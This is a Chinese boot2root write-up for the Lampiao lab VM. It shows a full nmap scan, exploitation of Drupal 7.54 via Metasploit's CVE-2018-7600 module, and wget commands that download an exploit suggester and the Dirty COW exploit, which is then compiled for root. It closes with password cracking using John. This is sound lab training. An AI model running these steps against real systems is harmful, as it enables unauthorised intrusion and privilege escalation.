渗透测试靶机Lampiao渗透WriteUp

  • 2019 年 10 月 6 日
  • 筆記

首先进行信息收集,查看存活的主机:

地址是172.16.1.94,存活。

root@kali:~# nmap -n -v -Pn -p- -A –reason-oN nmap.txt 172.16.1.94

Starting Nmap 7.70 ( https://nmap.org ) at2018-09-21 01:24 CST

NSE: Loaded 148 scripts for scanning.

NSE: Script Pre-scanning.

Initiating NSE at 01:24

Completed NSE at 01:24, 0.00s elapsed

Initiating NSE at 01:24

Completed NSE at 01:24, 0.00s elapsed

Initiating ARP Ping Scan at 01:24

Scanning 172.16.1.94 [1 port]

Completed ARP Ping Scan at 01:24, 0.04selapsed (1 total hosts)

Initiating SYN Stealth Scan at 01:24

Scanning 172.16.1.94 [65535 ports]

Discovered open port 80/tcp on 172.16.1.94

Discovered open port 22/tcp on 172.16.1.94

Discovered open port 1898/tcp on172.16.1.94

Completed SYN Stealth Scan at 01:24, 6.65selapsed (65535 total ports)

Initiating Service scan at 01:24

Scanning 3 services on 172.16.1.94

Completed Service scan at 01:24, 12.01selapsed (3 services on 1 host)

Initiating OS detection (try #1) against172.16.1.94

NSE: Script scanning 172.16.1.94.

Initiating NSE at 01:24

Completed NSE at 01:25, 38.03s elapsed

Initiating NSE at 01:25

Completed NSE at 01:25, 0.03s elapsed

Nmap scan report for 172.16.1.94

Host is up, received arp-response (0.00048slatency).

Not shown: 65532 closed ports

Reason: 65532 resets

PORT STATE SERVICE REASON VERSION

22/tcp open ssh syn-ack ttl 64 OpenSSH 6.6.1p1 Ubuntu2ubuntu2.7 (Ubuntu Linux; protocol 2.0)

| ssh-hostkey:

| 1024 46:b1:99:60:7d:81:69:3c:ae:1f:c7:ff:c3:66:e3:10 (DSA)

| 2048 f3:e8:88:f2:2d:d0:b2:54:0b:9c:ad:61:33:59:55:93 (RSA)

| 256 ce:63:2a:f7:53:6e:46:e2:ae:81:e3:ff:b7:16:f4:52 (ECDSA)

|_ 256 c6:55:ca:07:37:65:e3:06:c1:d6:5b:77:dc:23:df:cc (ED25519)

80/tcp open http? syn-ack ttl 64

| fingerprint-strings:

| NULL:

| _____ _ _

| |_|/ ___ ___ __ _ ___ _ _

| x20| __/ (_| __ x20|_| |_

| ___/ __| |___/ ___|__,_|___/__, ( )

| |___/

| ______ _ _ _

| ___(_) | | | |

| x20/ _` | / _ / _` | | | |/ _` | |

|_ __,_|__,_|_| |_|

1898/tcp open http syn-ack ttl 64 Apache httpd 2.4.7 ((Ubuntu))

|_http-favicon: Unknown favicon MD5:CF2445DCB53A031C02F9B57E2199BC03

|_http-generator: Drupal 7(http://drupal.org)

| http-methods:

|_ Supported Methods: GET HEAD POST OPTIONS

| http-robots.txt: 36 disallowed entries(15 shown)

| /includes/ /misc/ /modules/ /profiles//scripts/

| /themes/ /CHANGELOG.txt /cron.php/INSTALL.mysql.txt

| /INSTALL.pgsql.txt /INSTALL.sqlite.txt/install.php /INSTALL.txt

|_/LICENSE.txt /MAINTAINERS.txt

|_http-server-header: Apache/2.4.7 (Ubuntu)

|_http-title: LampixC3xA3o

1 service unrecognized despite returningdata. If you know the service/version, please submit the following fingerprintat https://nmap.org/cgi-bin/submit.cgi?new-service :

SF-Port80-TCP:V=7.70%I=7%D=9/21%Time=5BA3D7D5%P=x86_64-pc-linux-gnu%r(NULL

SF:,1179,"x20_____x20_x20x20x20_x20x20x20x20x20x20x20x20x20

SF:x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20

SF:x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x2

SF:0x20x20x20x20x20x20x20x20x20n|_x20x20x20_|x20|x20(x

SF:20)x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x2

SF:0x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x

SF:20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20

SF:x20nx20x20|x20|x20|x20|_|/x20___x20x20x20x20___x20x20

SF:__x20_x20___x20_x20x20x20_x20x20x20x20x20x20x20x20x20x2

SF:0x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20n

SF:x20x20|x20|x20|x20__|x20/x20__|x20x20/x20_x20\/x20_`

SF:x20/x20__|x20|x20|x20|x20x20x20x20x20x20x20x20x20x20

SF:x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20nx20_

SF:|x20|_|x20|_x20x20\__x20\x20|x20x20__/x20(_|x20\__x

SF:20\x20|_|x20|_x20x20x20x20x20x20x20x20x20x20x20x20x2

SF:0x20x20x20x20x20x20x20x20x20x20x20x20nx20\___/x20\__|

SF:x20|___/x20x20\___|\__,_|___/\__,x20(x20)x20x20x20x20

SF:x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20

SF:x20x20nx20x20x20x20x20x20x20x20x20x20x20x20x20x20x20

SF:x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20

SF:x20x20__/x20|/x20x20x20x20x20x20x20x20x20x20x20x20x20

SF:x20x20x20x20x20x20x20x20x20x20x20x20nx20x20x20x20x20x

SF:20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20

SF:x20x20x20x20x20x20x20x20x20x20x20|___/x20x20x20x20x20x

SF:20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20

SF:x20x20x20x20n______x20_x20x20x20x20x20x20x20_x20x20x20x

SF:20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20

SF:x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20

SF:x20x20x20x20x20x20x20x20x20_x20n|x20x20___(_)x20x20x

SF:20x20x20|x20|x20x20x20x20x20x20x20x20x20x20x20x20x20

SF:x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20

SF:x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20|x20|n

SF:|x20|_x20x20x20_x20x20x20x20__|x20|_x20x20x20_x20_x20_

SF:_x20___x20x20x20__x20_x20x20x20x20___x20x20__x20_x20_x20

SF:x20x20_x20x20__x20_|x20|n|x20x20_|x20|x20|x20x20/x20

SF:_`x20|x20|x20|x20|x20'_x20`x20_x20\x20/x20_`x20|x20x

SF:20/x20_x20\/x20_`x20|x20|x20|x20|/x20_`x20|x20|n|x2

SF:0|x20x20x20|x20|x20|x20(_|x20|x20|_|x20|x20|x20|

SF:x20|x20|x20|x20(_|x20|x20|x20x20__/x20(_|x20|x20|

SF:_|x20|x20(_|x20|_|n\_|x20x20x20|_|x20x20\__,_|\__

SF:,_|_|x20|_|");

MAC Address: 00:0C:29:26:BB:D7 (VMware)

Device type: general purpose

Running: Linux 3.X|4.X

OS CPE: cpe:/o:linux:linux_kernel:3cpe:/o:linux:linux_kernel:4

OS details: Linux 3.2 – 4.9

Uptime guess: 0.002 days (since Fri Sep 2101:22:35 2018)

Network Distance: 1 hop

TCP Sequence Prediction: Difficulty=260(Good luck!)

IP ID Sequence Generation: All zeros

Service Info: OS: Linux; CPE:cpe:/o:linux:linux_kernel

TRACEROUTE

HOP RTT ADDRESS

1 0.48 ms 172.16.1.94

NSE: Script Post-scanning.

Initiating NSE at 01:25

Completed NSE at 01:25, 0.00s elapsed

Initiating NSE at 01:25

Completed NSE at 01:25, 0.00s elapsed

Read data files from:/usr/bin/../share/nmap

OS and Service detection performed. Pleasereport any incorrect results at https://nmap.org/submit/ .

Nmap done: 1 IP address (1 host up) scannedin 63.20 seconds

Raw packets sent: 65651 (2.889MB) | Rcvd: 65550 (2.623MB)

root@kali:~#

-n (不用域名解析); -V (打印版本信息);-Pn (不检测主机存活);–reason (显示端口处于带确认状态的原因);-oN (将标准输出直接写入指定的文件) ;-p- (应该是全部端口都扫一遍)

开放的主机端口:80/22/1898

访问1898端口,结果如下:

http://172.16.1.94:1898/

用御剑big版扫描一下,得到很多信息:

有日志修改记录文件

访问日志修改记录文件,发现是Drupal 7.54版本

在metasploit中搜索drupal:

Drupal在2018年暴露出一个漏洞,编号是CVE-2018-7600,那么我们在这里就需要利用的是2018-3-28更新的exp,设置攻击参数信息:

攻击成功!拿到shell:

看一下信息:

www用户,

Ubuntu14系统

用一个脚本看一下现成可以提前的exp有哪些

wget -q -O /tmp/linux-exploit-suggester.sh https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh

执行查看一下当前的哪些漏洞可以用来提权

有脏牛漏洞,下载脚本并编译执行提权:

wget -q -O /tmp/40847.cpp https://www.exploit-db.com/download/40847.cpp
g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil

查找根目录下的flag:

页面有一个文章,根据文章的信息生成一个字典:

生成一个字典:

John爆破

这样便可以爆破出该用户的账户密码,也可以登录。

VirMach 便宜 VPS

QNews

QNews